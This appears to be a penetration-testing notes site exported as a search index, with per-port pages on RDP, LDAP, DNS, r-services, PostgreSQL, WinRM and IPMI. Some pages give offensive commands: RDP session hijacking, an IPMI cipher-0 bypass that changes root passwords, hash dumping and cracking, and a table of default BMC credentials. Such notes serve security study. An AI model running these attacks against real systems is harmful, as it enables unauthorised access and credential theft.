    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#rdp-process-injection","title":"RDP Process Injection","text":"

    If someone from a different domain or with better privileges login via RDP to the PC where you are an Admin, you can inject your beacon in his RDP session process and act as him:

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#rdp-sessions-abuse","title":"RDP Sessions Abuse","text":"
    # Adding User to RDP group\nnet localgroup \"Remote Desktop Users\" UserLoginName /add\n
    ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#shadow-attack","title":"Shadow Attack","text":"

    AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

    https://github.com/JoelGMSec/AutoRDPwn

    ","tags":["rdp","port 3389","mimikatz"]},{"location":"389-636-ldap/","title":"389 - 636 LDAP","text":"

    Application protocol used for accessing, modifying and querying distributed\u00a0directory information services (such as Active Directory) over a TCP/Internet Protocol\u00a0(IP) network. A Directory service would be a database-like virtual storage that holds data in a specific hierarchical structure. LDAP structure is based on a tree of directory entries.

    Lightweight Directory Access Protocol (LDAP) is an integral part of Active Directory (AD). The\u00a0Lightweight Directory Access Protocol\u00a0(LDAP)\u00a0is an open, vendor-neutral, industry standard\u00a0application protocol for accessing and maintaining distributed\u00a0directory information services over a TCP/IP\u00a0Internet Protocol\u00a0(IP) network.

    LDAP runs on port 389 (unencrypted connections) and 636 (LDAP SSL.)

    The relationship between AD and LDAP can be compared to Apache and HTTP. The same way Apache is a web server that uses the HTTP protocol, Active Directory is a directory server that uses the LDAP protocol. While uncommon, you may come across organizations while performing an assessment that does not have AD but does have LDAP, meaning that they most likely use another type of LDAP server such as OpenLDAP.

    • TCP and UDP port 389 and 636.
    • It's a binary protocol and by default not encrypted.
    • Has been updated to include encryptions addons, as Transport Layer Security (TLS)/SSL and can be tunnelled through SSH

    The hierarchy (tree) of information stored via LDAP is known as the Directory Information Tree (DIT). That structure is defined in a schema.

    A common use of LDAP is to provide a central place to store usernames and passwords. This allows many different applications and services to connect to the LDAP server to validate users.

    The latest LDAP specification is Version 3, which is published as RFC 4511. AD stores user account information and security information such as passwords and facilitates sharing this information with other devices on the network. LDAP is the language that applications use to communicate with other servers that also provide directory services. In other words, LDAP is a way that systems in the network environment can \"speak\" to AD.

    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ad-ldap-authentication","title":"AD LDAP Authentication","text":"

    LDAP is set up to authenticate credentials against AD using a \"BIND\" operation to set the authentication state for an LDAP session. There are two types of LDAP authentication.

    1. Simple Authentication: This includes anonymous authentication, unauthenticated authentication, and username/password authentication. Simple authentication means that a username and password create a BIND request to authenticate to the LDAP server.

    2. SASL Authentication: The Simple Authentication and Security Layer (SASL) framework uses other authentication services, such as Kerberos, to bind to the LDAP server and then uses this authentication service (Kerberos in this example) to authenticate to LDAP. The LDAP server uses the LDAP protocol to send an LDAP message to the authorization service which initiates a series of challenge/response messages resulting in either successful or unsuccessful authentication. SASL can provide further security due to the separation of authentication methods from application protocols.

    LDAP authentication messages are sent in cleartext by default so anyone can sniff out LDAP messages on the internal network. It is recommended to use TLS encryption or similar to safeguard this information in transit.

    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldif-file","title":"LDIF file","text":"

    Example of a LDIF file:

    dn: dc=example,dc=com\nobjectclass: top\nobjectclass: domain\ndc: example\n\ndn: ou=People, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: People\naci: (targetattr=\"*||+\")(version 3.0; acl \"IDM Access\"; allow (all)\n  userdn=\"ldap:///uid=idm,ou=Administrators,dc=example,dc=com\";)\n\ndn: uid=jgibbs, ou=People, dc=example,dc=com\nuid: jgibbs\ncn: Joshamee Gibbs\nsn: Gibbs\ngivenname: Joshamee\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\nmail: jgibbs@blackpearl.com\ntelephonenumber: +1 408 555 1234\nfacsimiletelephonenumber: +1 408 555 4321\nuserpassword: supersecret\n\ndn: uid=hbarbossa, ou=People, dc=example,dc=com\nuid: hbarbossa\ncn: Hector Barbossa\nsn: Barbossa\ngivenname: Hector\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\no: Brethren Court\nmail: captain.barbossa@example.com\ntelephonenumber: +421 910 382734\nfacsimiletelephonenumber: +1 408 555 1111\nroomnumber: 111\nuserpassword: deadjack\n\n# Note:\n# Lord Bectett is an exception to the cn = givenName + sn rule\n\ndn: uid=jbeckett, ou=People, dc=example,dc=com\nuid: jbeckett\ncn: Lord Cutler Beckett\nsn: Beckett\ngivenname: Cutler\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\no: East India Trading Co.\nmail: bigboss@eitc.com\ntelephonenumber: +421 910 382333\nfacsimiletelephonenumber: +1 408 555 2222\nroomnumber: 666\nuserpassword: takeovertheworld\n\ndn: ou=Groups, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: Groups\naci: (targetattr=\"*||+\")(version 3.0; acl \"IDM Access\"; allow (all)\n  userdn=\"ldap:///uid=idm,ou=Administrators,dc=example,dc=com\";)\n\ndn: cn=Pirates,ou=groups,dc=example,dc=com\nobjectclass: top\nobjectclass: groupOfUniqueNames\ncn: Pirates\nou: groups\nuniquemember: uid=jgibbs, ou=People, dc=example,dc=com\nuniquemember: uid=barbossa, ou=People, dc=example,dc=com\ndescription: Arrrrr!\n\ndn: ou=Administrators, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: Administrators\n\ndn: uid=idm, ou=Administrators,dc=example,dc=com\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nuid: idm\ncn: IDM Administrator\nsn: IDM Administrator\ndescription: Special LDAP acccount used by the IDM\n  to access the LDAP data.\nou: Administrators\nuserPassword: secret\nds-privilege-name: unindexed-search\n

    Ldap operators:

    Operator Description = Equal to | Logical OR ! Logical NOT & Logical AND * Wildcard, any strings or character

    Example: any surname starting by \"a\" or canonical name starting by \"b.\"

    (|(sn=a*)(cn=b*))\n
    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldap-queries-ldapfilter","title":"LDAP queries: LDAPFilter","text":"

    By combining the \"Get-ADObject\" cmdlet with the \"LDAPFilter\" parameter in powershell we can perform some ldap queries via powershell.

    Get-ADObject -LDAPFilter <FILTER> | select cn\n

    Some useful LDAPFilters:

    Search for LDAP query Find All Workstations ' (objectCategory=computer)' Find All DomainControllers '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))' Search for LDAP query Find All Users ' (&(objectCategory=person)(objectClass=user))' Filnd All Contacts '(objectClass=contact)' Find All Users and Contacts '(objectClass=user)' List Disabled Users '(userAccountControl:1.2.840.113556.1.4.803:=2)' Search for LDAP query Find All Groups '(objectClass=group)' Find direct members of a Security Group '(memberOf=CN=Admin,OU=Security,DC=DOM,DC=NT)'

    More:

    • LDAP Queries related to AD computers
    • LDAP queries related to AD users.
    • LDAP queries related to AD groups.
    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldap-queries-search-filters","title":"LDAP queries: Search Filters","text":"

    The LDAPFilter parameter with the same cmdlets lets us use LDAP search filters when searching for information.

    Operators:

    • & -> and
    • | -> or
    • ! -> not

    AND Operation:

    • One criteria: (& (..C1..) (..C2..))
    • More than two criteria: (& (..C1..) (..C2..) (..C3..))

    OR Operation:

    • One criteria: (| (..C1..) (..C2..))
    • More than two criteria: (| (..C1..) (..C2..) (..C3..))
    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#filters","title":"Filters","text":"Criteria Rule Example Equal to (attribute=123) (&(objectclass=user)(displayName=Smith) Not equal to (!(attribute=123)) !objectClass=group) Present (attribute=*) (department=*) Not present (!(attribute=*)) (!homeDirectory=*) Greater than (attribute>=123) (maxStorage=100000) Less than (attribute<=123) (maxStorage<=100000) Approximate match (attribute~=123) (sAMAccountName~=Jason) Wildcards (attribute=*A) (givenName=*Sam)","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#exploiting-vulndap","title":"Exploiting vuLnDAP","text":"

    https://github.com/digininja/vuLnDAP

    All schema for querying is in https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html

    Examples:

    ","tags":["active","directory","ldap","windows","port","389"]},{"location":"43-whois/","title":"Port 43 - whois","text":"

    It is a TCP-based transaction-oriented query/response protocol listening on TCP port 43 by default. We can use it for querying databases containing domain names, IP addresses, or autonomous systems and provide information services to Internet users.

    The Internet Corporation of Assigned Names and Numbers (ICANN) requires that accredited registrars enter the holder's contact information, the domain's creation, and expiration dates, and other information in the Whois database immediately after registering a domain. In simple terms, the Whois database is a searchable list of all domains currently registered worldwide.

    Sysinternals WHOIS for Windows or Linux WHOIS command-line utility are our preferred tools for gathering information. However, there are some online versions like whois.domaintools.com we can also use.

    # linux\nwhois $TARGET\n\n# windows\nwhois.exe $TARGET\n
    ","tags":["port 111","rpc","NFS","Network File System"]},{"location":"512-513-514-r-services/","title":"512 r services","text":"

    R-services span across the ports 512, 513, and 514 and are only accessible through a suite of programs known as r-commands. R-Services are a suite of services hosted to enable remote access or issue commands between Unix hosts over TCP/IP.

    r-services were the de facto standard for remote access between Unix operating systems until they were replaced by the Secure Shell (SSH) protocols and commands due to inherent security flaws built into them. They are most commonly used by commercial operating systems such as Solaris, HP-UX, and AIX. While less common nowadays, we do run into them from time to time.

    The R-commands suite consists of the following programs:

    • rcp (remote copy)
    • rexec (remote execution)
    • rlogin (remote login)
    • rsh (remote shell)
    • rstat
    • ruptime
    • rwho (remote who).

    These are the most frequently abused commands:

    Command Service Daemon Port Transport Protocol Description rcprshd 514 TCP Copy a file or directory bidirectionally from the local system to the remote system (or vice versa) or from one remote system to another. It works like the cp command on Linux but provides no warning to the user for overwriting existing files on a system. rshrshd 514 TCP Opens a shell on a remote machine without a login procedure. Relies upon the trusted entries in the /etc/hosts.equiv and .rhosts files for validation. rexecrexecd 512 TCP Enables a user to run shell commands on a remote machine. Requires authentication through the use of a username and password through an unencrypted network socket. Authentication is overridden by the trusted entries in the /etc/hosts.equiv and .rhosts files. rloginrlogind 513 TCP Enables a user to log in to a remote host over the network. It works similarly to telnet but can only connect to Unix-like hosts. Authentication is overridden by the trusted entries in the /etc/hosts.equiv and .rhosts files.

    The /etc/hosts.equiv file contains a list of trusted hosts and is used to grant access to other systems on the network.

    "},{"location":"512-513-514-r-services/#footprinting-r-services","title":"Footprinting r-services","text":"
    sudo nmap -sV -p 512,513,514 $ip\n

    Even though, these services utilize Pluggable Authentication Modules (PAM) for user authentication onto a remote system by default, they also bypass this authentication through the use of the /etc/hosts.equiv and .rhosts files on the system.

    If any misconfiguration exists on those files, we could get access to those services.

    # Example of a misconfiguration in rhosts file:\n\nhtb-student     10.0.17.5\n+               10.0.17.10\n+               +\n\n# The file follows the specific syntax of `<username> <ip address>` or `<username> <hostname>` pairs. Additionally, the `+` modifier can be used within these files as a wildcard to specify anything. In this example, the `+` modifier allows any external user to access r-commands from the `htb-student` user account via the host with the IP address `10.0.17.10`.\n
    "},{"location":"512-513-514-r-services/#accessing-the-service","title":"Accessing the service","text":"
    # Login \nrlogin $ip -l <username>\n\n# list all interactive sessions on the local network by sending requests to the UDP port 513\nrwho\n\n#  detailed account of all logged-in users over the network, including information such as the username, hostname of the accessed machine, TTY that the user is logged in to, the date and time the user logged in, the amount of time since the user typed on the keyboard, and the remote host they logged in from (if applicable).\nrusers -al $ip\n
    "},{"location":"53-dns/","title":"Port 53 - Domain Name Server (DNS)","text":"

    Globally distributed DNS servers translate domain names into IP addresses and thus control which server a user can reach via a particular domain. There are several types of DNS servers that are used worldwide:

    Server Type Description DNS Root Server Root servers of DNS are responsible for the top-level domains (TLD). As the last instance, they are only requested if the name server does not respond. The ICANN coordinates the work of the root name servers. There are 13 such root servers around the globe. Authoritative Nameserver Authoritative name servers hold authority for a particular zone. They only answer queries from their area of responsibility, and their information is binding. If an authoritative name server cannot answer a client's query, the root name server takes over at that point. Non-authoritative Nameserver Non-authoritative name servers are not responsible for a particular DNS zone. Instead, they collect information on specific DNS zones themselves, which is done using recursive or iterative DNS querying. Caching DNS Server Caching DNS servers cache information from other name servers for a specified period. The authoritative name server determines the duration of this storage. Forwarding Server Forwarding servers perform only one function: they forward DNS queries to another DNS server. Resolver Resolvers are not authoritative DNS servers but perform name resolution locally in the computer or router.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#resource-records","title":"Resource records","text":"

    A resource record is a four-tuple that contains the following 4 fields:

    (Name, Value, Type, TTL)\n
    • A records: If Type=A, then Name is a hostname and Value is the IP address for that name. We recognize the IP addresses that point to a specific (sub)domain through the A record. Example:
    (relay1.bar.example.com, 145.222.36.125, A)\n
    • MX records: If Type=MX, then Value is the canonical name of a mail server that has an alias hostname Name. The mail server records show us which mail server is responsible for managing the emails for the company. Example:

      (example.com,mail.bar.example.com,MX)\n

    • NS records: If Type=NS, then Name is a domain (such as example.com) and Value is the name of an authoritative DNS server that knows how to obtain the IP address for hosts in the domain. These kinds of records show which name servers are used to resolve the FQDN to IP addresses. Most hosting providers use their own name servers, making it easier to identify the hosting provider. Example:

      (example.com,dns.example.com,NS)\n

    • CNAME records: If Type=CNAME, then Value is a canonical hostname for the alias hostname Name. Example:

      (example.com,relay1.bar.example.com,CNAME)\n

    • TXT records: this type of record often contains verification keys for different third-party providers and other security aspects of DNS, such as SPF, DMARC, and DKIM, which are responsible for verifying and confirming the origin of the emails sent. Here we can already see some valuable information if we look closer at the results.

    • AAAA records: Returns an IPv6 address of the requested domain.
    • PTR record: The PTR (Pointer) record works the other way around (reverse lookup). It converts IP addresses into valid domain names. For the IP address to be resolved from the Fully Qualified Domain Name (FQDN), the DNS server must have a reverse lookup file. In this file, the computer name (FQDN) is assigned to the last octet of an IP address, which corresponds to the respective host, using a PTR record. The PTR records are responsible for the reverse translation of IP addresses into names.
    • SOA records: (Start Of Authority (SOA)). It should be first in a zone file because it indicates the start of a zone. Each zone can only have one SOA record, and additionally, it contains the zone's values, such as a serial number and multiple expiration timeouts. Provides information about the corresponding DNS zone and email address of the administrative contact. The SOA record is located in a domain's zone file and specifies who is responsible for the operation of the domain and how DNS information for the domain is managed.

    Summarizing:

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#security","title":"Security","text":"

    DNS is mainly unencrypted. Devices on the local WLAN and Internet providers can therefore hack in and spy on DNS queries. Since this poses a privacy risk, there are now some solutions for DNS encryption. By default, IT security professionals apply DNS over TLS (DoT) or DNS over HTTPS (DoH) here. In addition, the network protocol NSCrypt also encrypts the traffic between the computer and the name server.

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#ips-to-add-to-etcresolvconf","title":"IPs to add to etc/resolv.conf","text":"

    1.1.1.1 is a public DNS resolver operated by Cloudflare that offers a fast and private way to browse the Internet. Unlike most DNS resolvers, 1.1.1.1 does not sell user data to advertisers. In addition, 1.1.1.1 has been measured to be the fastest DNS resolver available.

    See DNS enumeration

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#dns-transfer-zones","title":"DNS transfer zones","text":"

    See dig axfr.

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#dns-server","title":"DNS server","text":"

    There are many different configuration types for DNS. All DNS servers work with three different types of configuration files:

    1. local DNS configuration files
    2. zone files
    3. reverse name resolution files

    The DNS server Bind9 is very often used on Linux-based distributions. Its local configuration file (named.conf) is roughly divided into two sections, firstly the options section for general settings and secondly the zone entries for the individual domains. The local configuration files are usually:

    • /etc/bind/named.conf.local
    • /etc/bind/named.conf.options
    • /etc/bind/named.conf.log

    In the file /etc/bind/named.conf.local we can define the different zones. A zone file is a text file that describes a DNS zone with the BIND file format. In other words it is a point of delegation in the DNS tree. The BIND file format is the industry-preferred zone file format and is now well established in DNS server software. A zone file describes a zone completely. There must be precisely one SOA record and at least one NS record. The SOA resource record is usually located at the beginning of a zone file. The main goal of these global rules is to improve the readability of zone files. A syntax error usually results in the entire zone file being considered unusable. The name server behaves similarly as if this zone did not exist. It responds to DNS queries with a SERVFAIL error message.

    DNS misconfigurations and vulnerabilities.

    Option Description allow-query Defines which hosts are allowed to send requests to the DNS server. allow-recursion Defines which hosts are allowed to send recursive requests to the DNS server. allow-transfer Defines which hosts are allowed to receive zone transfers from the DNS server. zone-statistics Collects statistical data of zones.

    A list of vulnerabilities targeting the BIND9 server can be found at CVEdetails. In addition, SecurityTrails provides a short list of the most popular attacks on DNS servers.

    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#footprinting-dns","title":"Footprinting DNS","text":"

    See nslookup.

    # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

    See dig.

    # Querying: A Records for a Subdomain\n dig a www.example @$ip\n # here, $ip refers to ip of DNS server\n\n# Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n# here, $ip refers to ip of DNS server\n\n# View all available records\ndig any example.com @$ip\n # here, $ip refers to ip of DNS server. The more recent RFC8482 specified that `ANY` DNS requests be abolished. Therefore, we may not receive a response to our `ANY` request from the DNS server.\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n\n# Querying: PTR Records for an IP Address\ndig -x $ip @1.1.1.1\n\n# Querying: TXT Records\ndig txt example.com @$ip\n\n# Querying: MX Records\ndig mx example.com @1.1.1.1\n

    Transfer a zone (more on dig axfr)

    dig axfr example.htb @$ip\n

    If the administrator used a subnet for the allow-transfer option for testing purposes or as a workaround solution or set it to any, everyone would query the entire zone file at the DNS server.

    Another tools for transferring zones:

    Fierce:

    # Perform a dns transfer using a wordlist againts domain.com\nfierce -dns domain.com \n

    dnsenum:

    dnsenum domain.com\n# additionally it performs DNS brute force with /usr/share/dnsenum/dns.txt.\n
    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#subdomain-brute-enumeration","title":"Subdomain brute enumeration","text":"

    Using Sec wordlist:

    for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
    ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#tools-for-passive-enumeration","title":"Tools for passive enumeration","text":"Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Sublist3r Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. DNSRecon Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target. dnsdumpster.com DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#tools-for-active-enumeration","title":"Tools for active enumeration","text":"Tool + Cheat sheet What it does dnsenum multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. dig discover non-contiguous ip blocks. fierce DNS scanner that helps locate non-contiguous IP space and hostnames. dnscan Python wordlist-based DNS subdomain scanner. gobuster For brute force enumerations. nslookup . amass In depth DNS Enumeration and network mapping.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"5432-postgresql/","title":"5432 postgreSQL","text":"

    https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql.

    ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#description","title":"Description","text":"

    In some cases, the default service that runs on TCP port 5432 is PostgreSQL, which is a database management system: creating, modifying, and updating databases, changing and adding data, and more. PostgreSQL can typically be interacted with using a command-line tool called psql.

    psql\n
    ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#installation","title":"Installation","text":"","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#linux","title":"Linux","text":"

    If the tool is not installed, then run:

    sudo apt install postgresql-client-common\n

    If your user is not in the sudoers file, we can do some workarounds about it. Some options arise here:

    -uploading static binaries onto the target machine, -port-forwarding, or tunneling, using SSH.

    Using SSH and postgresql:

    1. In the attacking machine:

    ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n

    2. In another terminal in the attacking machine:

    sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n
    ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#powershell","title":"Powershell","text":"
    Install-Module PostgreSQLCmdlets\n
    ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#basics-commands-in-postgresql","title":"Basics commands in postgresql","text":"
    # List databases\n# Short version: \\l\n\\list\n\n# Connect to a database\n# Short version: \\c NameOfDataBase\n\\connect NameOfDatabase\n\n# List database tables (once you have selected a database)\n\\dt\n\n# Dump content from a column\nSELECT * FROM NameOfColumn;\n# Watch out! Case sensitive\n
    ","tags":["postgresql","port 5432"]},{"location":"55007-55008-dovecot/","title":"55007 - 55008 dovecot","text":"","tags":["dovecot","port 55007","port 55008"]},{"location":"55007-55008-dovecot/#dovecot","title":"dovecot","text":"

    You can connect with a dovecot server using the telnet protocol.

    telnet IP port\n# Example: telnet 192.168.56.101 55007\n
    ","tags":["dovecot","port 55007","port 55008"]},{"location":"55007-55008-dovecot/#basic-commands","title":"Basic commands","text":"
    # Enter the username to login\nUSER username\n\n# Enter password\nPASS secretword\n\n# Now, you are logged in and you can list message on the server for that user\nLIST\n\n# And you can read them using their id (id is a number=\nRETR id\n\n# You might be able to delete them\nDELE id\n
    ","tags":["dovecot","port 55007","port 55008"]},{"location":"5985-5986-winrm-windows-remote-management/","title":"Port 5985, 5986 - WinRM - Windows Remote Management","text":"

    How is WinRM different from Remote Desktop (RDP)? WinRM is a protocol for remote management, while Remote Desktop (RDP) is a protocol for remote desktop access. WinRM allows for remote execution of management commands, while RDP provides a graphical interface for remote desktop access.

    WinRM is part of the operating system. However, to obtain data from remote computers, you must configure a WinRM listener.

    WinRM is a network protocol based on XML web services using the Simple Object Access Protocol (SOAP) used for remote management of Windows systems. It takes care of the communication between Web-Based Enterprise Management (WBEM) and the Windows Management Instrumentation (WMI), which can call the Distributed Component Object Model (DCOM).WinRM uses the Simple Object Access Protocol (SOAP) to establish connections to remote hosts and their applications. However, for security reasons, WinRM must be activated and configured manually in Windows 10. WinRM uses the TCP ports 5985 (HTTP) and 5986 (HTTPS).

    Another component that fits WinRM for administration is Windows Remote Shell (WinRS), which lets us execute arbitrary commands on the remote system. The program is even included on Windows 7 by default.

    ","tags":["tools","port 5985","port 5986","winrm"]},{"location":"5985-5986-winrm-windows-remote-management/#footprinting-winrm","title":"Footprinting winrm","text":"

    As we already know, WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS) by default, which we can scan using Nmap:

    nmap -sV -sC $ip -p5985,5986 --disable-arp-ping -n\n

    We'll connect to the WinRM service on the target and try to get a session. Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM which is made for this kind of scenario.

    evil-winrm -i $ip -u <username> -p <password>\n

    For windows, we can use The Test-WsMan cmdlet.

    ","tags":["tools","port 5985","port 5986","winrm"]},{"location":"623-intelligent-platform-management-interface-ipmi/","title":"623 - Intelligent Platform Management Interface (IPMI)","text":"

    Intelligent Platform Management Interface (IPMI) is a system management tool that provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI can also be used for remote upgrades to systems without requiring physical access to the target host. IPMI communicates over port 623 UDP. IPMI is typically used in three ways:

    • Before the OS has booted to modify BIOS settings
    • When the host is fully powered down
    • Access to a host after a system failure
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#footprinting-ipmi","title":"Footprinting ipmi","text":"

    Many Baseboard Management Controllers (BMCs) (including HP iLO, Dell DRAC, and Supermicro IPMI) expose a web-based management console, some sort of command-line remote access protocol such as Telnet or SSH, and the port 623 UDP, which, again, is for the IPMI network protocol.

    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#discovery","title":"Discovery","text":"
    nmap -n -p 623 10.0.0./24\nnmap -n-sU -p 623 10.0.0./24\nuse  auxiliary/scanner/ipmi/ipmi_version\n
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#version","title":"Version","text":"
     sudo nmap -sU --script ipmi-version -p 623 <hostname/IP>\n

    Metasploit scanner module IPMI Information Discovery (auxiliary/scanner/ipmi/ipmi_version): this module discovers host information through IPMI Channel Auth probes:

    use auxiliary/scanner/ipmi/ipmi_version\n\nshow actions ...actions... msf \nset ACTION < action-name > msf \nshow options \n# and set needed options\nrun\n

    We might find BMCs where the administrators have not changed the default password:

    Product Username Password Dell Remote Access Card (iDRAC, DRAC) root calvin HP Integrated Lights Out (iLO) Administrator randomized 8-character string consisting of numbers and uppercase letters Supermicro IPMI (2.0) ADMIN ADMIN IBM Integrated Management Module (IMM) USERID PASSW0RD (with a zero) Fujitsu Integrated Remote Management Controller admin admin Oracle/Sun Integrated Lights Out Manager (ILOM) root changeme ASUS iKVM BMC admin admin

    These default passwords may gain us access to the web console or even command line access via SSH or Telnet.

    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#vulnerability-ipmi-authentication-bypass-via-cipher-0","title":"Vulnerability - IPMI Authentication Bypass via Cipher 0","text":"

    Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.

    use auxiliary/scanner/ipmi/ipmi_cipher_zero\n

    Abuse this flaw with ipmitool:

    # Install\napt-get install ipmitool \n\n# Use Cipher 0 to dump a list of users. With -C 0 any password is accepted\nipmitool -I lanplus -C 0 -H $ip -U root -P root user list \n\n# Change the password of root\nipmitool -I lanplus -C 0 -H $ip -U root -P root user set password 2 abc123 \n
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#ipmi-20-rakp-remote-sha1-password-hash-retrieval","title":"IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval","text":"

    If default credentials do not work to access a BMC, we can turn to a flaw in the RAKP protocol in IPMI 2.0. During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place.

    Metasploit module:

    This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.

    use auxiliary/scanner/ipmi/ipmi_dumphashes\n\nshow actions\n\nset ACTION < action-name >\n\nshow options\n# set <options>\n\nrun\n

    Hashcat:

    hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u\n
    ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#how-does-ipmi-work","title":"How does IPMI work","text":"

    IPMI can monitor a range of different things such as system temperature, voltage, fan status, and power supplies. It can also be used for querying inventory information, reviewing hardware logs, and alerting using SNMP. The host system can be powered off, but the IPMI module requires a power source and a LAN connection to work correctly.

    Systems using IPMI version 2.0 can be administered via serial over LAN, giving sysadmins the ability to view serial console output in band. To function, IPMI requires the following components:

    • Baseboard Management Controller (BMC) - A micro-controller and essential component of an IPMI
    • Intelligent Chassis Management Bus (ICMB) - An interface that permits communication from one chassis to another
    • Intelligent Platform Management Bus (IPMB) - extends the BMC
    • IPMI Memory - stores things such as the system event log, repository store data, and more
